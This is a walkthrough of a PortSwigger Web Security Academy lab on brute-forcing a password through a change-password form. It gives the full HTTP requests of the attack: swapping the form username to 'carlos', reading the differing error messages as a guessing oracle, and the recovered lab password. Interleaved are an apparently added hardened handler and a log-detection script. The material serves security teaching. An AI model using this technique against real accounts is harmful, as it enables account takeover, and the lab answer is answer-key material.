Port Swigger Password brute force via password cha
Password brute-force via password change
Solution
Login to website as user: wiener
GET /login HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=5m0MW10ngWCyOPmP3VtCiTc49CI2miai
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /login HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=5m0MW10ngWCyOPmP3VtCiTc49CI2miai
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener&password=peter
Change password for user: wiener
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener&current-password=peter&new-password-1=qwerty&new-password-2=qwerty
Checking password change logic
Incorrect current password and new passwords don't match --> Current password is incorrect
Correct current password and new passwords don't match --> New passwords do not match
---
(1)
Request
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener&current-password=qwertyqwerty&new-password-1=pass1&new-password-2=pass2
___
Response
...
<header class="notification-header">
</header>
<h1>My Account</h1>
<p class=is-warning>Current password is incorrect</p>
<div id=account-content>
...
---
(2)
Request
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener&current-password=qwerty&new-password-1=pass1&new-password-2=pass2
___
Response
<header class="notification-header">
</header>
<h1>My Account</h1>
<p class=is-warning>New passwords do not match</p>
<div id=account-content>
<p>Your username is: wiener</p>
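The two responses above differ only because the handler reports on the current password before it validates the new ones, and because it accepts the account name from the form. The following hardened handler is an added example, not code from the lab or from PortSwigger; the `Accounts` class, the status codes and the `MAX_FAILURES` threshold are assumptions made for illustration.

```python
import hashlib
import hmac
import os

MAX_FAILURES = 5  # assumed lockout threshold, not taken from the lab

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class Accounts:
    """Constructed in-memory stand-in for the user table."""
    def __init__(self, users):
        self.salt = {u: os.urandom(16) for u in users}
        self.pw = {u: hash_pw(p, self.salt[u]) for u, p in users.items()}
        self.failures = {u: 0 for u in users}

    def verify(self, user, password):
        candidate = hash_pw(password, self.salt[user])
        return hmac.compare_digest(self.pw[user], candidate)

def change_password(db, session_user, form):
    """Return (status, message) for POST /my-account/change-password."""
    # The account comes from the authenticated session only; a
    # "username" field in the form is never consulted.
    if session_user not in db.pw:
        return 401, "Not logged in"
    if db.failures[session_user] >= MAX_FAILURES:
        return 429, "Too many attempts"
    # New-password validation runs first, so this message no longer
    # depends on whether the current-password guess was right.
    new1 = form.get("new-password-1", "")
    new2 = form.get("new-password-2", "")
    if not new1 or new1 != new2:
        return 400, "New passwords are empty or do not match"
    if not db.verify(session_user, form.get("current-password", "")):
        db.failures[session_user] += 1  # every wrong guess is counted
        return 403, "Current password is incorrect"
    db.pw[session_user] = hash_pw(new1, db.salt[session_user])
    db.failures[session_user] = 0
    return 200, "Password changed"
```

With this ordering, a request with mismatched new passwords returns the same response whether or not the supplied current password is correct, and a session for one user can never test another user's password.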
Brute force password for user: carlos
Edit username: carlos
current-password=qwerty (current password)
new-password-1=pass1 (random password)
new-password-2=pass2 (random password)
List of passwords from: https://portswigger.net/web-security/authentication/auth-lab-passwords
---
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=carlos&current-password=qwerty&new-password-1=pass1&new-password-2=pass2
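On the defending side, the request above leaves two signals in application logs: the form username differs from the session's user, and "Current password is incorrect" repeats for one target. The following detection sketch is an added example, not part of the original write-up; the log line format, its field names (`session_user`, `form_user`, `result`), the "Password changed" result text and the threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import Counter

# Assumed application log format (constructed for this example).
LINE = re.compile(
    r'^(?P<ts>\S+) POST /my-account/change-password '
    r'session_user=(?P<session_user>\S+) form_user=(?P<form_user>\S+) '
    r'result="(?P<result>[^"]*)"$')

THRESHOLD = 3  # assumed: failures per (session user, target) before alerting

def detect(lines, threshold=THRESHOLD):
    """Return sorted alerts as (kind, session_user, target, count)."""
    cross_account = Counter()
    failed = Counter()
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # not a change-password record
        key = (m["session_user"], m["form_user"])
        # Signal 1: the form names an account other than the session's.
        if m["session_user"] != m["form_user"]:
            cross_account[key] += 1
        # Signal 2: repeated wrong current-password submissions.
        if m["result"] == "Current password is incorrect":
            failed[key] += 1
    alerts = [("cross-account", s, t, n) for (s, t), n in cross_account.items()]
    alerts += [("guessing", s, t, n)
               for (s, t), n in failed.items() if n >= threshold]
    return sorted(alerts)

# Constructed sample records: one legitimate change, then four
# requests from wiener's session that name carlos.
PREFIX = "POST /my-account/change-password session_user=wiener"
SAMPLE = [
    f'2024-08-01T10:00:00Z {PREFIX} form_user=wiener result="Password changed"',
    f'2024-08-01T10:00:05Z {PREFIX} form_user=carlos result="Current password is incorrect"',
    f'2024-08-01T10:00:06Z {PREFIX} form_user=carlos result="Current password is incorrect"',
    f'2024-08-01T10:00:07Z {PREFIX} form_user=carlos result="Current password is incorrect"',
    f'2024-08-01T10:00:08Z {PREFIX} form_user=carlos result="New passwords do not match"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```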
Login to website as user: carlos
Login: carlos
Password: thunder
---
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
username=carlos&current-password=thunder&new-password-1=pass1&new-password-2=pass2
---
POST /login HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=pGgdwKplDzAtqUWchbHpkHi9APhbIekP
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=carlos&password=thunder
Solved